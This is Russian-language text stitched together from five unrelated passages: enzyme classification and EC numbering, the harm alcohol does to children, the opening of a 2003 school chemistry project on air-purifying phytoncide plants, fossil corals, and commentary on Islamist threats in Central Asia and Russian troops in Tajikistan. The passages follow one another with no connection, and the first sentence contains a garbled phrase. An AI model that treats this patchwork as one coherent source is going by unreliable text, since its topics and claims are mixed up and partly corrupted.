    Ферменты Робота естьмама и прапажа каждого подкласса разбивают на подклассы, в которых ещё строже уточняют структуру химических групп, отличающих субстраты друг от друга. Подкласс это последняя низшая ступень классификации. Внутри подклассов перечисляют уже отдельные, индивидуальные ферменты. Таким образом, вся система проста и достаточно стройна: КЛАСС- ПОДКЛАСС- ПОДПОДКЛАСС- ИНДИВИДУАЛЬНЫЙ ФЕРМЕНТ. В соответствии с этим принципом классификации предложена очень удобная система нумерации (индексации) ферментов. Каждый индекс состоит из четырёх цифр, разделённых точками: 1. Номер класса. 2. Номер подкласса в данном классе 3. Номер подподкласса 4. Номер, присвоенный данному индивидуальному ферменту этого подподкласса» (В. И. Розенгарт Ферменты- двигатели жизни) Например, амилаза-фермент, гидролизующий крахмал с которой мы уже встречались неоднократно, имеет индекс 3.2.1.1. Классификация ферментов построена так, что в ней оставлены свободные места для ещё не открытых ферментов.                                      НОМЕНКЛАТУРА.

    Вследствие незрелости нервных клеток и повышенной рефлекторной возбудимости коры больших полушарий, слабости тормозных процессов, в ответ даже на небольшие дозы алкоголя у детей часто развиваются тяжелые отравления, различные заболевания. Прием алкоголя нарушает умственную деятельность — слабеет память, страдает мышление. Высока чувствительность к алкоголю детей ослабленных, часто болеющих, и особенно тех, которые имеют или перенесли в прошлом какие-либо поражения нервной системы, например: родовую травму, сотрясение мозга, менингит, энцефалит. Алкоголь отягощает последствия этих заболеваний. Алкоголь, поражая в первую очередь нервную систему, одновременно действует и на другие органы и ткани. Сердечно-сосудистая система в период роста и развития детей функционирует в условиях повышенной нагрузки. Сердце ребенка растет пропорционально его общему росту, т. е. наиболее интенсивно в раннем возрасте. При таком интенсивном росте волокна сердечной мышцы обильно снабжаются кровью и лимфой, что облегчает влияние на сердце токсичных различных веществ, например алкоголя.

    Муниципальное образовательное учреждение Средняя школа №2 с углубленным изучением предметов гуманитарного профиля Секция: химия. Использование фитонцидных растений для оздоровления воздуха помещений. Автор: Еленевская Ульяна Владимировна. Руководитель: Моисеева Н.Г. учитель химии Г. Пермь 2003 Содержание Введение Стр. 3. Глава I. Фитонциды Стр. 6 Глава II. Влияние условий среды Стр. 7 Глава III. Методы изучения антимикробных свойств. Стр. 9 Глава IV. Лечебное воздействие летучих выделений растений на человека Стр. 10 Глава V. Профилактика респираторных заболеваний Стр. 12 Список литературы Стр. 15 Приложение ВВЕДЕНИЕ. С глубокой древности человек стремился украсить свое жили­ще растениями. Интерьерное озеленение возникло как элемент культуры человека, отвечающий его эстетическим потребностям. Человек ощущал себя единым целым с природой, к ней он и обра­щался за исцелением, перенося частицу живой природы в свой дом. Стремление это было интуитивным. В настоящее время науч­ный подход к интерьерному озеленению подразумевает сочета­ние эстетического восприятия красоты формы, окраски цветов и листьев растений с другой, полезной функцией растений, о кото­рой было давно известно: живые растения улучшают состав воз­духа и очищают атмосферу.

    Их достоверные древнейшие представители известны с ордовика, но возможно, они появились и раньше. Палеонтология располагает не самими организмами, а их остатками, которые могут сохраняться в ископаемом состоянии — окаменевшими скелетами, отпечатками, слепками, ядрами. В этом отношении кораллы представляют собой очень ценный объект для палеонтологических исследований, поскольку большинство из них всегда формировало прочный скелет. Собственно кораллы — исключительно морские животные. Они могут быть одиночными и колониальными. Тело каждого полипа (зооида) имеет вид мешочка со щелевидным отверстием — ртом, который окружен щупальцами. От рта во внутреннюю полость идет короткая сплющенная глотка. Сама внутрен-няя полость разделена вертикальными перегородками (мезентериями), не соединяющимися в центре полости между собой. Стенка, как и у всех других кишечнополостных, трехслойная. В ископаемом состоянии отпечатки мягких частей тела кораллов встречаются крайне редко. В этом отношении уникальна находка, сделанная канадским палеонтологом П. Коппером (Copper, 1985).

    Такой же сценарий может повториться и на правом берегу Аму-Дарьи. Ведь в самом Узбекистане у ваххабитов весьма сильные позиции, особенно в Ферганской долине, где во многих районах на 13 мечетей приходится лишь одна средняя школа. Если же говорить о потребности вмешательства российских вооруженных сил в случае внутреннего конфликта или внешней агрессии, то за примерами далеко ходить не приходится. В соседнем Таджикистане многолетняя война с вооруженной исламской оппозицией, безусловно, окончилась бы поражением душанбинских властей, если бы не российское военное вмешательство. И до сегодняшнего дня рубежи этой республики охраняют и обороняют 5 российских погранотрядов. Кроме того, в Таджикистане дислоцирована 201 -я российская мотострелковая дивизия, усиленная артиллерийской бригадой и вертолетным полком. Она прикрывает 11 оперативных направлений афганской границы и можно вполне недвусмысленно заявить - власть президента Рахмонова зиждется на российских штыках. Если же исламские фанатики с помощью афганских талибов разожгут в Узбекистане очередной пожар джихада, думается, одной российской дивизии, даже весьма усиленной, для его тушения не хватит.